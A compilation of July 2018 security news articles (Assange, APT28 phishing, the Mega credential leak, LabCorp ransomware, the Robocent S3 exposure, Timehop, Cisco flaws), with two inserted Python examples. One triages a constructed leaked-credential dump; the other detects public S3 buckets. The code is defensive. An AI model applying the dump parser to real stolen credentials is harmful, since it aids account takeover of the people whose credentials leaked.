Ecuador to withdraw asylum for Julian Assange in coming weeks or days
22.7.2018 securityaffairs  BigBrothers

According to media, Ecuador is going to hand over the WikiLeaks founder Julian Assange to the UK in “coming weeks or even days.”
In 2012 a British judge ruled that WikiLeaks founder Julian Assange should be extradited to Sweden to face allegations of sexual assault there, but Assange received political asylum from Ecuador and has spent the years since inside its London embassy.

Now Ecuador is planning to withdraw its political asylum, likely next week. This means that Assange will have to leave the embassy, where British authorities will arrest him.

“Sources close to Assange said he himself was not aware of the talks but believed that America was putting ‘significant pressure’ on Ecuador, including threatening to block a loan from the International Monetary Fund (IMF) if he continues to stay at the embassy,” reported RT.

The newly elected President of Ecuador, Lenín Moreno, arrived in London on Friday. Officially the purpose of his trip is to take part in the Global Disability Summit on 24 July 2018, but media reports suggest he was there to reach an agreement with the UK government to withdraw Assange's asylum protection.

“ECUADOR’S PRESIDENT Lenin Moreno traveled to London on Friday for the ostensible purpose of speaking at the 2018 Global Disabilities Summit (Moreno has been using a wheelchair since being shot in a 1998 robbery attempt). The concealed, actual purpose of the President’s trip is to meet with British officials to finalize an agreement under which Ecuador will withdraw its asylum protection of Julian Assange, in place since 2012, eject him from the Ecuadorian Embassy in London, and then hand over the WikiLeaks founder to British authorities.” wrote Glenn Greenwald on the Intercept.

Glenn Greenwald

· 20 Jul
The editor-in-chief of RT says the Ecuadorian government - now highly subservient to the west under @Lenin's government - will withdraw its asylum grant to Julian Assange and hand him over to the UK. People pretending to believe in press freedom will cheer if he's sent to the US: https://twitter.com/M_Simonyan/status/1019958571889577985 …

Glenn Greenwald

Which is the greater threat to press freedom: (a) sending Julian Assange to the US to be prosecuted by the Sessions DOJ for publishing classified and hacked docs or (b) Donald Trump tweeting mean insults at Chuck Todd and Wolf Blitzer and being rude to Jim Acosta?

6:05 PM - Jul 20, 2018

Glenn Greenwald

The above report that UK & Ecuador are preparing to turn Assange over to UK appears to be true. Big question is whether the US will indict him & seek his extradition, the way Sessions & Pompeo vowed they would. Can't wait to see how many fake press freedom defenders support that.

8:37 PM - Jul 20, 2018
In May 2017, Swedish prosecutors dropped their preliminary investigation into an allegation of rape against Julian Assange, but the WikiLeaks founder fears that he would be extradited to the US, where he is facing federal charges for his role in the Chelsea Manning case.

Three months ago, Ecuador cut off Assange's internet access, mainly to prevent him from expressing support for Catalonia in its independence dispute with the Spanish Government.

According to Ecuador, Assange had violated the agreement to refrain from interfering in other states’ politics.

What are the current charges against Assange in the UK?

The only criminal proceeding against Assange is a pending 2012 arrest warrant for “failure to surrender” that is considered by experts a minor bail violation charge.

This charge carries a prison term of three months and a fine, though it is possible that the time Assange has already spent in prison in the UK could be counted against that sentence.

Microsoft uncovered and stopped attempts to launch spear-phishing attacks on three 2018 congressional candidates
20.7.2018 securityaffairs

Microsoft helped the US Government protect at least three 2018 midterm election candidates from attacks by Russian cyberspies.
Microsoft revealed that Russian cyberspies attempted to hack at least three 2018 midterm election candidates and that it helped the US government repel the attacks.

A Microsoft executive speaking at the Aspen Security Forum revealed the hacking attempts against at least three unnamed congressional candidates; all the attacks were detected this year.

The company executive only added that the three candidates were “people who, because of their positions, might have been interesting targets from an espionage standpoint as well as an election disruption standpoint.”

The hackers sent spear-phishing messages to the candidates, the messages included links to a fake Microsoft website used by the cyberspies to trick victims into providing their credentials.

“Earlier this year, we did discover that a fake Microsoft domain had been established as the landing page for phishing attacks,” said Tom Burt, Microsoft’s vice president for customer security.

“And we saw metadata that suggested those phishing attacks were being directed at three candidates who are all standing for election in the midterm elections.”

Once Microsoft discovered the phishing website, it took it down and helped the US government to “avoid anybody being infected by that particular attack.”

Microsoft blamed the Russian APT28 group for the attacks.

We “discovered that the [fake domains] were being registered by an activity group that at Microsoft we call Strontium…that’s known as Fancy Bear or APT 28,” Burt explained.

“The consensus of the threat intelligence community right now is [that] we do not see the same level of activity by the Russian activity groups leading into the mid-year elections that we could see when we look back at them at that 2016 elections,” he added.

Burt compared the recent activity with the hacking campaign conducted to interfere with the 2016 Presidential election. He pointed out that, unlike the 2016 campaigns, the 2018 attacks have not targeted the think tanks and academic experts that were hit during the 2016 presidential election.

“That does not mean we’re not going to see it, there is a lot of time left before the election.” Burt added.

Thousands of Mega account credentials leaked online, it is credential stuffing
20.7.2018 securityaffairs Incident

Thousands of account credentials associated with the popular file storage service Mega have been published online.
The former NSA hacker Patrick Wardle, co-founder at Digita Security, discovered in June a text file containing over 15,500 usernames, passwords, and file names.

patrick wardle

😢 Found file on VirusTotal w/ 15K+ Mega accounts (user names/passwords & users' file listings)

😥🤬 File listings included files names describing child abuse content

👮🏽‍♂️🚔🌍 International law enforcement actively engaged

🙏🏽 @zackwhittaker for writeup & collaboration! https://twitter.com/zackwhittaker/status/1018997928793464833 …

11:01 AM - Jul 18, 2018
The presence of the file listings suggests that the threat actors who collected the credentials also accessed each account and listed its content.

Wardle discovered the file after it was uploaded to the VirusTotal service some months earlier by a user purportedly in Vietnam.

Wardle passed the data to ZDNet that verified the huge trove of data belongs to the Mega service.

ZDNet contacted many users that confirmed the authenticity of the content of the file.

The data appears to date back to 2013, when Kim Dotcom launched the service.


ZDNet asked the popular expert Troy Hunt, who runs the data breach notification site Have I Been Pwned, to analyze the files.

Hunt believes the hackers collected the credentials from other data breaches (credential stuffing).

98 percent of the addresses in the file had already been included in a previous data breach and were listed in Hunt’s service.

“Some 87 percent of the accounts in the Mega file were found in a massive collection of 2,844 data breaches that he uploaded to the service in February, said Hunt.” read the post published by ZDNet.

“Of those we contacted, five said that they had used the same password on different sites.”
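The triage described above, as an added example that is not ZDNet's, Troy Hunt's or Mega's code: it parses a constructed dump in an assumed "email:password:file1;file2" layout, measures how many addresses were already present in a (constructed) index of earlier breaches, checks passwords against a (constructed) Pwned-Passwords style range table using the k-anonymity prefix lookup so that no password leaves the machine, and counts accounts that carry a file listing, the sign that the actor actually logged in.

```python
import hashlib
from collections import Counter

# Constructed sample of a leak file in the "email:password:file1;file2" layout
# assumed here for the example; it also assumes addresses and passwords
# contain no ':' (the real dump's layout is not described on the page).
LEAK = """\
alice@example.com:Summer2013!:holiday.jpg;notes.txt
bob@example.org:hunter2:backup.zip
carol@example.net:correct horse battery staple:thesis.pdf;refs.bib
dave@example.com:hunter2:
# blank lines and comment lines are ignored

eve@example.org:P@ssw0rd:photos/1.jpg
"""

# Constructed stand-in for a breach-notification index: addresses that already
# appeared in earlier breaches (what a HIBP-style lookup would report).
PREVIOUSLY_BREACHED = {
    "alice@example.com", "bob@example.org", "dave@example.com", "eve@example.org",
}


def sha1_hex(password: str) -> str:
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


# Constructed stand-in for a Pwned-Passwords style range table. The real service
# is queried with only the first five hex characters of SHA-1(password) and
# returns every known suffix under that prefix, so the password itself is never
# transmitted; here the "response" is built locally from a few known-bad passwords.
RANGE_TABLE = {}
for _pw in ("hunter2", "P@ssw0rd", "123456"):
    _h = sha1_hex(_pw)
    RANGE_TABLE.setdefault(_h[:5], set()).add(_h[5:])


def parse_leak(text: str) -> list:
    """Parse dump lines into {email, password, files}; skips blanks and comments."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":", 2)
        if len(parts) < 2:
            continue  # malformed line, not a credential
        email, password = parts[0].lower(), parts[1]
        files = [f for f in parts[2].split(";") if f] if len(parts) == 3 else []
        records.append({"email": email, "password": password, "files": files})
    return records


def password_previously_leaked(password: str, range_table=RANGE_TABLE) -> bool:
    """k-anonymity check: look up the 5-char prefix, compare the suffix locally."""
    h = sha1_hex(password)
    return h[5:] in range_table.get(h[:5], set())


def triage(records: list, breached=PREVIOUSLY_BREACHED) -> dict:
    """Summarise the dump the way the article's analysis does: share of addresses
    seen in prior breaches, share of passwords already known-leaked, accounts
    with a file listing, and passwords shared by several accounts."""
    n = len(records)

    def pct(k):
        return round(100.0 * k / n, 1) if n else 0.0

    seen_before = sum(r["email"] in breached for r in records)
    leaked_pw = sum(password_previously_leaked(r["password"]) for r in records)
    listed = sum(bool(r["files"]) for r in records)
    reuse = Counter(r["password"] for r in records)
    return {
        "accounts": n,
        "seen_in_prior_breach_pct": pct(seen_before),
        "known_leaked_password_pct": pct(leaked_pw),
        "accounts_with_file_listing": listed,
        "passwords_shared_by_multiple_accounts": {p: c for p, c in reuse.items() if c > 1},
    }


if __name__ == "__main__":
    for key, value in triage(parse_leak(LEAK)).items():
        print(f"{key}: {value}")
```

A high "seen in prior breach" share with no matching service-side breach is the signature of credential stuffing; a high "known leaked password" share says which of those accounts are exposed right now.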

Mega chairman Stephen Hall also confirmed the file is the result of credential stuffing.

Experts noticed that the Mega service doesn’t implement two-factor authentication, making it easy for attackers to access an account once they have obtained its credentials from other breaches.

Mega logs the IP address of each user who accesses an account, and some users confirmed they had noticed suspicious logins to their accounts from countries in Eastern Europe, Russia, and South America since the file was uploaded.

“One of the accounts in the file contained file listings for what appeared to describe child abuse content. Given the nature of the account’s content, ZDNet informed the authorities.” continues ZDNet.

The illegal content was uploaded years earlier, suggesting that the account owner stored it himself, ruling out any recent third-party involvement.

“Mega has zero tolerance for child sexual abuse materials,” said Hall. “Any reports result in links being deactivated immediately, the user’s account closed and the details provided to the authorities.”

“Mega can’t act as censor by examining content as it is encrypted at the user’s device before being transferred to Mega,” he said. “As well as it being technically impossible, it is also practically infeasible for Mega and other major cloud storage providers, with 100s of files being uploaded each second.”

‘IT system issue’ caused cancellation of British Airways flights at Heathrow
20.7.2018 securityaffairs Security

British Airways canceled flights at Heathrow due to an ‘IT system issue,’ the incident occurred on Wednesday and affected thousands of passengers.
The problem had severe repercussions on the air traffic, many passengers also had their flights delayed.

“On one of the busiest days of the summer, British Airways cancelled dozens of flights to and from Heathrow, affecting at least 7,000 passengers

Problems began for BA when the control tower was closed for around 35 minutes on Wednesday afternoon when a fire alarm was triggered. Landings and take-offs were stopped.” reported the British newspaper The Independent.

“Then an IT issue emerged which caused further disruption for BA and other airlines. Hundreds of flights were delayed, and some evening outbound departures were canceled. Around 3,000 British Airways passengers were stranded overnight abroad.”
The IT problem affected 7,000 passengers and more than 3,000 were forced to spend the night abroad attempting to fly back to London.

Officially, the problem originated with the IT supplier Amadeus, whose failure caused the disruption to the flights; British Airways said so in a statement on its Twitter account. Reportedly, the British Airways passengers stranded at the airport were advised to ‘look for overnight accommodation or seek alternative travel arrangements’.

It seems that the IT problems also affected the company's online check-in service.

“We are aware that British Airways is currently experiencing an issue which is impacting their ability to provide boarding passes to some passengers. We will be working with the airline to support their efforts to resolve the issue as quickly as possible.” stated a spokesperson for Heathrow.

The problems began a few hours after a fire alarm at Heathrow’s air traffic control tower was triggered, causing delays for several airlines. According to the airport, this event is not related to the British Airways issue, although the airline's glitch had “impacted operation of the airfield for a short while”.

“The vast majority of customers affected by the supplier system issue and the temporary closure of Heathrow airport’s air traffic control tower are now en route to their destinations.”

“The supplier, Amadeus, resolved their system issue last night, and our schedule is now operating as normal.” said a spokesperson for British Airways.

“We have apologised to our customers for disruption to their travel plans.”

British Airways experienced another technical problem at its IT systems in May 2017.

HR Services Firm ComplyRight Suffers Data Breach
20.7.2018 securityweek Incident

Florida-based HR services provider ComplyRight revealed recently that its tax reporting platform was involved in a cybersecurity incident that resulted in the exposure of personal information.

ComplyRight learned on May 22 that someone had gained unauthorized access to its web-based tax reporting platform, which is used by various websites to prepare W-2, 1099 and other tax-related forms.

ComplyRight, which is owned by marketing company Taylor Corporation, provides tax solutions through efile4Biz. The efile4Biz website claims its services are used by 76,000 organizations.

However, ComplyRight says the data breach impacted fewer than 10 percent of the individuals whose tax forms have been prepared on its platform.

An investigation conducted by the company showed that the attacker gained access to the names, addresses, phone numbers, email addresses, and Social Security numbers of individual tax form recipients. However, ComplyRight has not been able to determine whether the compromised information was actually downloaded by the unauthorized party, and says it has not seen any evidence of fraud as a direct result of the incident.

Affected individuals are being notified by mail and offered 12 months of free credit monitoring and identity theft protection services.

Security blogger Brian Krebs reported that some of the recipients of these letters were unaware of ComplyRight. The company clarified that its platform is used by various tax form preparation websites whose customers are impacted by the breach and many may not be familiar with the ComplyRight brand.

According to Krebs, the attackers had access to ComplyRight systems between April 20, 2018 and May 22, 2018.

“Upon learning of the issue, we disabled the platform, remediated the issue on the website, and commenced a prompt and thorough investigation using external cybersecurity professionals to determine who was potentially affected and what information was accessed or viewed,” ComplyRight stated. “Although the investigation determined the information was accessed and/or viewed, it could not confirm if the information was downloaded or otherwise acquired by an unauthorized user.”

ComplyRight is not the only HR services firm hit by a data breach recently. Australia-based PageUp reported last month that hackers may have gained access to names, contact information, usernames, and password hashes. PageUp says it has 2.6 million active users across over 190 countries.

Ransomware Attack Hits Health Firm LabCorp
20.7.2018 securityweek Ransomware

Burlington, North Carolina-based LabCorp took some of its systems offline last weekend after discovering that some had been infected by ransomware.

LabCorp, a company that provides “diagnostic, drug development and technology-enabled solutions for more than 115 million patient encounters per year,” serves hundreds of thousands of customers nationwide and processes tests on more than 2.5 million patient specimens per week.

With revenues that topped $10 billion last year, the health company operates a network of more than 1,900 patient service centers (PSCs) nationally and employs about 60,000 people.

In an 8-K filing with the U.S. Securities and Exchange Commission on Monday, the company revealed that, over the weekend of July 14, it detected suspicious activity on its network and decided to take some systems offline to contain the activity.

“The activity was subsequently determined to be a new variant of ransomware,” the health firm said, responding to a SecurityWeek inquiry on the attack.

“LabCorp promptly took certain systems offline as part of its comprehensive response to contain and remove the ransomware from its system. This has temporarily affected some test processing and customer access to test results,” the company said.

As of Monday, testing operations had already resumed and the firm was working on bringing additional systems and functions online.

“Work has been ongoing to restore full system functionality as quickly as possible, testing operations have substantially resumed, and we are working to restore additional systems and functions over the next several days,” the company told SecurityWeek.

The ransomware, LabCorp says, only impacted its Diagnostics systems but did not affect Covance Drug Development systems. The health firm also revealed it has “engaged outside security experts and is working with authorities, including law enforcement.”

For the time being, the “investigation has found no evidence of theft or misuse of data,” the company said.

Industry Reactions to U.S. Indicting 12 Russians for DNC Hack
20.7.2018 securityweek BigBrothers

The U.S. last week indicted 12 Russian intelligence officers over their alleged role in a hacking operation targeting the Democratic National Committee (DNC) and Hillary Clinton’s 2016 presidential campaign.

The charges, part of special counsel Robert Mueller’s investigation into Russia’s attempt to interfere in the presidential election, were announced just days before President Donald Trump met his Russian counterpart, Vladimir Putin.

Industry professionals have commented on the charges, their impact, the possible threat actors responsible for the operation, and how these types of attacks can be avoided.

And the feedback begins...

John Hultquist, Director of Intelligence Analysis, FireEye:

“While we had already been aware of much of the information covered in the indictment, there were several interesting insights into the organizations that lie behind the intrusion operators we track. In particular, the document indicates that more than one GRU unit was involved in efforts to undermine the elections. The first of these units, Unit 26165, resembles APT28, the operator who we originally suspected of carrying out the DNC incident. The second of these two units, Unit 74455, is implicated in incidents affecting election systems.

We have been actively tracking an actor we believe was tied to those incidents, and have found some connection between those incidents and others, such as efforts to target the 2017 French elections, and disruptive attacks on the 2018 Olympics, as well as other incidents. Ultimately, though much of their activity remains opaque, we believe GRU organizations have been behind many of the most aggressive incidents in recent memory, including the economically devastating NotPetya attacks and attacks on Ukraine’s grid.”

John Gomez, CEO, Sensato:

“When you consider all that is going on and developing with the Russian hackers, it is important to note that we are very much in the embryonic stages of learning what, specifically, occurred. As more and more comes to light, I suspect we will come to appreciate the high level of sophistication that was employed to carry out the attacks. This attack was planned far in advance. It relied upon the coordination of various assets, including the development of fake personas, the recruitment of cybercriminals, monitoring news feeds, and establishing on-the-ground assets that could be plied for information and intelligence. The attackers timed the attacks to shake confidence and cause confusion.

Although the Russian hackers targeted our government, the real lesson here is that this level of sophistication is not isolated to the Russian hackers identified in the U.S Federal indictment. Rather, we are seeing that other criminal organizations, nation states, and even terrorists are employing the same level of sophistication in their operations. This development with Russia simply highlights what many of us have known all along: Attackers, regardless of motivation, have matured their tactics, techniques, and procedures. They’re innovating at a pace that far outstrips the defenses that most organizations have erected. Even basic attacks, such as phishing, are not the same approaches used a few years ago.

We may be appalled, shocked, and even outraged. Yet, maybe the biggest lesson is that despite all efforts, we failed at protecting one of our most treasured assets--the democratic process. What is more appalling is that many will continue to believe that the adversaries our IT organizations faced just a few years ago are the same adversaries our IT organizations face today. Hopefully, what has occurred with Russia will be a wake-up call, not only at the national level, but within our own organizations. If Russia can manipulate an electoral process, what could they and other, highly focused, well-funded cyber attackers do to our economy, our healthcare organizations, and other critical infrastructure systems like transportation or communications?”

Richard Ford, Chief Scientist, Forcepoint:

“We shouldn’t be distracted by talks of how they did this or why but instead – how will the international community respond to these types of asymmetric attacks that impact the very core of our democratic process? While an indictment is a nice gesture, it has little real consequences beyond drawing yet more attention to the issue.

Cybersecurity knows no borders, and so it is relatively easy for a nation state – or even an enthusiastic group of individuals – to launch attacks from the safety of their own country that can be impactful but carry very little personal risk. How we decide to treat these offensive cyber operations is one of the most pressing questions of our time, and those questions cannot be answered by governments alone. Attacks often involve third-party infrastructure, and vulnerabilities in this infrastructure have to be addressed by those in the commercial world.

It’s time for us as an international community to truly come together and determine not only what constitutes acceptable behavior online at the nation state level, but what checks and balances can be meaningfully put in place to those states that refuse to adhere to these agreed upon practices.”

Ross Rustici, Head of Intelligence Research, Cybereason:

"This further confirms the links already exposed from the indictments related to the social media influence campaigns. The concentrated effort of the Russia state to influence the election is undeniable. The most surprising thing about this is not only the relative ease of the intrusions but the widespread campaign perpetrated by the GRU. This only serves to reinforce the dramatic changes that the internet has brought to influence operations around the world. The ease with which intelligence agencies can have a direct influence in the information age is something that they could only dream of during the Cold War."

Kevin Mitnick, Chief Hacking Officer, KnowBe4:

“After reading the Russian indictment I was surprised to see that the Russians use the same exact methods we use to test our client's security controls. Our security engineers have never failed to get in when we can use social engineering (phishing, etc) during an assessment.

The biggest takeaway was that spearphishing is *still* the easiest way the bad guys get in. Why the DNC didn't use Multi-Factor Authentication is beyond me. I believe it is the lack of security awareness training that made it easy for the Russians to hack our election.”

Leo Taddeo, CISO, Cyxtera:

“The indictment teaches cyber security professionals several important lessons. Many legacy security solutions, even when used in combination, simply aren’t designed to mitigate the risks presented by today's adversaries.

A user-centric, context-aware model is non-negotiable – Access controls that require only user name and password are effectively useless. Given the seemingly unstoppable effectiveness of spearphishing, enterprises must assume that one or more of their users has had their credentials compromised. An effective security solution must do more than just verify a user name and password. It must be able to tell if the context of a remote connection is suspicious, such as if it originates from an unusual location or time of day, or from a device with no antivirus software installed. It should also be able to ask for additional authentication steps like one-time passwords (OTP), adjust user permissions on the fly and ultimately block access according to the level of risk. To accomplish this, organizations must adopt a user-centric context-aware model that is built on the principle of least privilege.

Authenticate first, connect second – The indictment specifically calls out that the conspirators conducted scanning on the network IP protocols. The fundamental reason for this vulnerability is that TCP/IP – which was originally designed to operate in an environment where the user community knew and trusted each other – is based on implicit trust, with a “connect first, authenticate second” approach. In today’s hyperconnected and highly adversarial threat landscape, this approach puts organizations at risk. Alternate access control technologies, such as Software-Defined Perimeter (SDP), are built on an “authenticate first, connect second” approach, ensuring that only authorized users can connect to network resources. This reduces the attack surface and significantly improves security. With Software Defined Perimeter, all resources are invisible to the dangerous reconnaissance techniques outlined in the indictment.

Manage the risks of third-party access – The indictment reveals the conspirators hacked into the DNC’s computers through their access to the DCCC network. Then, they installed and managed different types of malware to explore the DNC network and steal documents. This highlights the need for organizations to better manage the risks of third-party access. By using a solution that leverages the Software-Defined Perimeter (SDP) security framework, organizations can ensure that all endpoints attempting to access a given infrastructure are authenticated and authorized prior to accessing any resources on the network. This not only applies the principle of least privilege to the network, it also reduces the attack surface area by hiding network resources from unauthorized or unauthenticated users.”

Robocalling Firm Exposes U.S. Voter Records
20.7.2018 securityweek BigBrothers

A publicly accessible Amazon Web Services S3 bucket belonging to a political autodial firm was exposing hundreds of thousands of United States voter records.

Discovered by Kromtech Security's Bob Diachenko, the misconfigured data repository is part of robocalling company Robocent’s cloud storage and has been already indexed by searchable database GrayhatWarfare, which currently lists over 48,000 open S3 buckets.

The Virginia Beach-based political autodial firm claims to have over 10 years of combined autodial experience and to be able to “reach thousands of voters instantly.”

“Our powerful dialer can make thousands of calls a minute, ensuring large calls always meet the deadline,” Robocent notes on its website.

The company’s publicly accessible storage listed 2,594 files, including audio files with pre-recorded political messages for robocalls (*.mp3, *.wav).

More importantly, the Amazon S3 bucket contained a large amount of voter data (in the form of *.csv, *.xls files): full name, suffix, prefix; phone numbers (cell and landlines); address with house, street, city, state, zip, precinct; age and birth year; and gender.

Other voter information found in the cloud storage included affiliation provided by state, or inferred based on voting trends/history; jurisdiction breakdown based on district, zip code, precinct, county, state; and demographics based on ethnicity, language, and education, Diachenko reveals.

Many of the files in the S3 bucket were aggregated from outside data firms such as NationalBuilder.

In addition to making political robocalls starting at 1¢ per dial, Robocent also sells voter data at only 3¢ per record. The company also advertises on its website the data points it collects.

“We provide voter files for every need, whether it be for a new robocall or simply to update records for door knocking. Our simple request process allows users to choose exactly who to target with no minimum order,” Robocent says on its website.

According to Diachenko, the company quickly secured the S3 bucket and its files after being responsibly alerted to the issue.

“We're a small shop (I'm the only developer) so keeping track of everything can be tough,” Diachenko was told.
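An offline check for the kind of misconfiguration described above, added here as an example and not Kromtech's or Robocent's code: it takes bucket ACL and bucket policy documents in the JSON shape the S3 GetBucketAcl and GetBucketPolicy APIs return (the sample documents below are constructed) and flags ACL grants to the public AllUsers / AuthenticatedUsers groups and Allow statements addressed to an anonymous principal.

```python
import json

# Group URIs S3 uses for "everyone" and "any authenticated AWS account".
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers (anonymous)",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers (any AWS account)",
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _is_anonymous(principal) -> bool:
    """True for Principal "*" or {"AWS": "*"} (also when "*" sits in a list)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def acl_findings(acl: dict) -> list:
    """Flag ACL grants to the public groups (READ on a bucket lets anyone list it)."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            findings.append(f"ACL grants {grant.get('Permission')} to {PUBLIC_GROUPS[grantee['URI']]}")
    return findings


def policy_findings(policy: dict) -> list:
    """Flag Allow statements with an anonymous principal; Deny statements are skipped."""
    findings = []
    for st in _as_list(policy.get("Statement", [])):
        if st.get("Effect") != "Allow" or not _is_anonymous(st.get("Principal")):
            continue
        actions = ", ".join(_as_list(st.get("Action", [])))
        cond = " (narrowed by a Condition; review it)" if st.get("Condition") else ""
        findings.append(f"policy statement {st.get('Sid', '<no Sid>')} allows {actions} to everyone{cond}")
    return findings


def bucket_exposure(acl_json: str, policy_json=None) -> list:
    """Run both checks; an empty list means no public grant was found."""
    acl = json.loads(acl_json)
    policy = json.loads(policy_json) if policy_json else {}
    return acl_findings(acl) + policy_findings(policy)


# Constructed samples in the shape of GetBucketAcl / GetBucketPolicy output.
OWNER = {"Type": "CanonicalUser", "ID": "EXAMPLE-OWNER-ID"}
EXPOSED_ACL = json.dumps({"Owner": {"ID": OWNER["ID"]}, "Grants": [
    {"Grantee": OWNER, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
     "Permission": "READ"},
]})
PRIVATE_ACL = json.dumps({"Owner": {"ID": OWNER["ID"]},
                          "Grants": [{"Grantee": OWNER, "Permission": "FULL_CONTROL"}]})
EXPOSED_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicReadGetObject", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-voter-bucket/*"},
    {"Sid": "DenyInsecureTransport", "Effect": "Deny", "Principal": "*",
     "Action": "s3:*", "Resource": "arn:aws:s3:::example-voter-bucket/*",
     "Condition": {"Bool": {"aws:SecureTransport": "false"}}},
]})

if __name__ == "__main__":
    for finding in bucket_exposure(EXPOSED_ACL, EXPOSED_POLICY) or ["no public access found"]:
        print(finding)
```

Feeding it the documents pulled for every bucket in an account turns the one-off finding above into a routine inventory check.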

Over the past several years, there were numerous incidents involving voter databases, including one reported by Diachenko in December last year, where an improperly secured MongoDB database exposed the information of the entire voting population of California: it contained 19,264,123 records.

Cisco fixes critical and high severity flaws in Policy Suite and SD-WAN products
19.7.2018 securityaffairs

Cisco has found over a dozen critical and high severity vulnerabilities in its Policy Suite, SD-WAN, WebEx and Nexus products.
The tech giant has reported to customers four critical vulnerabilities affecting the Policy Suite.

The flaws tracked as CVE-2018-0374, CVE-2018-0375, CVE-2018-0376, and CVE-2018-0377 have been discovered during internal testing.

Two of these flaws could be exploited by a remote unauthenticated attacker to access the Policy Builder interface and the Open Systems Gateway initiative (OSGi) interface.

Access to the Policy Builder interface could allow an attacker to change existing repositories and create new ones, while access to the OSGi interface could allow an attacker to access or change any file accessible by the OSGi process.

Another flaw could allow an unauthenticated attacker to modify any data contained in the Policy Builder database.

“A vulnerability in the Policy Builder database of Cisco Policy Suite could allow an unauthenticated, remote attacker to connect directly to the Policy Builder database.” reads the security advisory published by Cisco.

“The vulnerability is due to a lack of authentication. An attacker could exploit this vulnerability by connecting directly to the Policy Builder database. A successful exploit could allow the attacker to access and change any data in the Policy Builder database.”

Cisco also warned that the Cluster Manager in Policy Suite contains a root account with default and static credentials. A remote attacker can exploit the vulnerability to access the account and execute arbitrary commands with root privileges.

Cisco also warned of the presence of seven flaws in the SD-WAN solution; one of them affects the Zero Touch Provisioning service and could be exploited by an unauthenticated attacker to trigger a denial-of-service (DoS) condition.

Other SD-WAN vulnerabilities could allow an authenticated attacker to overwrite arbitrary files on the underlying operating system, and execute arbitrary commands with vmanage or root privileges.

Cisco also reported a high severity DoS vulnerability that affects Nexus 9000 series Fabric switches, the issue resides in the implementation of the DHCPv6 feature.

Cisco fixed all the vulnerabilities and confirmed that none of them have been exploited in attacks in the wild.

Timehop provides additional details on the recent security breach

19.7.2018 securityaffairs Incident

Timehop recently announced that it suffered a data breach affecting 21 million user accounts. The company has now shared additional details about the incident.
The Timehop service aims to help people find new ways to connect with each other by analyzing their past activities. Earlier this month, the company revealed that one or more malicious hackers had gained unauthorized access to a database storing usernames, phone numbers, email addresses, and social media access tokens for all users.

The security breach also exposed access tokens used by Timehop to access other social networks such as Twitter, Facebook, and Instagram. The tokens have been quickly revoked and currently don’t work.

On Wednesday the company provided an update on the incident, adding that further information was exposed, including dates of birth, genders, and country codes.

“Earlier reports of “up to 21 million emails” were correct. However we now provide the following breakdown of Personally Identifiable Information (PII) that was breached, and the combinations contained in records” reads the update provided by the company.

Combination | Total records | GDPR-covered records
Name, email, phone, DOB | 3.3 million | 174,000
Name, email address, phone | 3.4 million | 181,000
Name, email address, DOB | 13.6 million | 2.2 million
Name, phone number, DOB | 3.6 million | 189,000
Name and email address | 18.6 million | 2.9 million
Name and phone number | 3.7 million | 198,000
Name and DOB | 14.8 million | 2.5 million
Name total | 20.4 million | 3.8 million
DOB total | 15.5 million | 2.6 million
Email addresses total | 18.6 million | 2.9 million
Gender designation total | 9.2 million | 2.6 million
Phone numbers total | 4.9 million | 243,000

The company provided a detailed breakdown of the exposed information, including a separate count of the affected PII records that fall under the newly introduced GDPR.

According to the company, hackers first breached its systems on December 19, 2017, using an employee’s credentials for the company’s cloud computing environment.

The attackers accessed the systems through an IP address in the Netherlands.

In a first phase, the hacker conducted reconnaissance; at the time, the compromised environment did not store any personal information. In early April the company moved personal information into the compromised database, and the attackers found it only on June 22.

On July 4, the hacker exfiltrated the data and changed the password. The company noticed the activity within about 24 hours.

“They did not immediately suspect a security incident for two reasons that in retrospect are learning moments,” reads the technical analysis published by Timehop. “First, because it was a holiday and no engineers were in the office, he considered it likely that another engineer had been doing maintenance and changed the password. Second, password anomalies of a similar nature had been observed in past outage. He made the decision that the event would be examined the next day, when engineers returned to the office.”

Facebook faces £500,000 fine in the U.K. over Cambridge Analytica scandal

19.7.2018 securityaffairs Social

Facebook has been fined £500,000 ($664,000) in the U.K. for its conduct in the Cambridge Analytica privacy scandal.
Facebook has been fined £500,000 in the U.K., the maximum fine allowed by the UK’s Data Protection Act 1998, for failing to protect users’ personal information.


Political consultancy firm Cambridge Analytica improperly collected data of 87 million Facebook users and misused it.

“Today’s progress report gives details of some of the organisations and individuals under investigation, as well as enforcement actions so far.

This includes the ICO’s intention to fine Facebook a maximum £500,000 for two breaches of the Data Protection Act 1998.” reads the announcement published by the UK Information Commissioner’s Office.

“Facebook, with Cambridge Analytica, has been the focus of the investigation since February when evidence emerged that an app had been used to harvest the data of 50 million Facebook users across the world. This is now estimated at 87 million.

The ICO’s investigation concluded that Facebook contravened the law by failing to safeguard people’s information. It also found that the company failed to be transparent about how people’s data was harvested by others.”

This is the first possible financial punishment that Facebook is facing for the Cambridge Analytica scandal.

“A significant finding of the ICO investigation is the conclusion that Facebook has not been sufficiently transparent to enable users to understand how and why they might be targeted by a political party or campaign,” reads ICO’s report.

Obviously, the financial penalty is negligible compared to the earnings of the social networking giant, but it is a strong message to all companies that must properly manage users’ personal information in compliance with the new General Data Protection Regulation (GDPR).

What would have happened if the regulation had already been in force at the time of disclosure?

Under the GDPR, the penalties allowed are much greater: fines can reach up to 4% of global turnover, which in Facebook’s case is estimated at $1.9 billion.

“Facebook has failed to provide the kind of protections they are required to under the Data Protection Act.” Elizabeth Denham, the UK’s Information Commissioner said. “People cannot have control over their own data if they don’t know or understand how it is being used. That’s why greater and genuine transparency about the use of data analytics is vital.”

Facebook still has a chance to respond to the ICO’s Notice of Intent before a final decision on the fine is made.

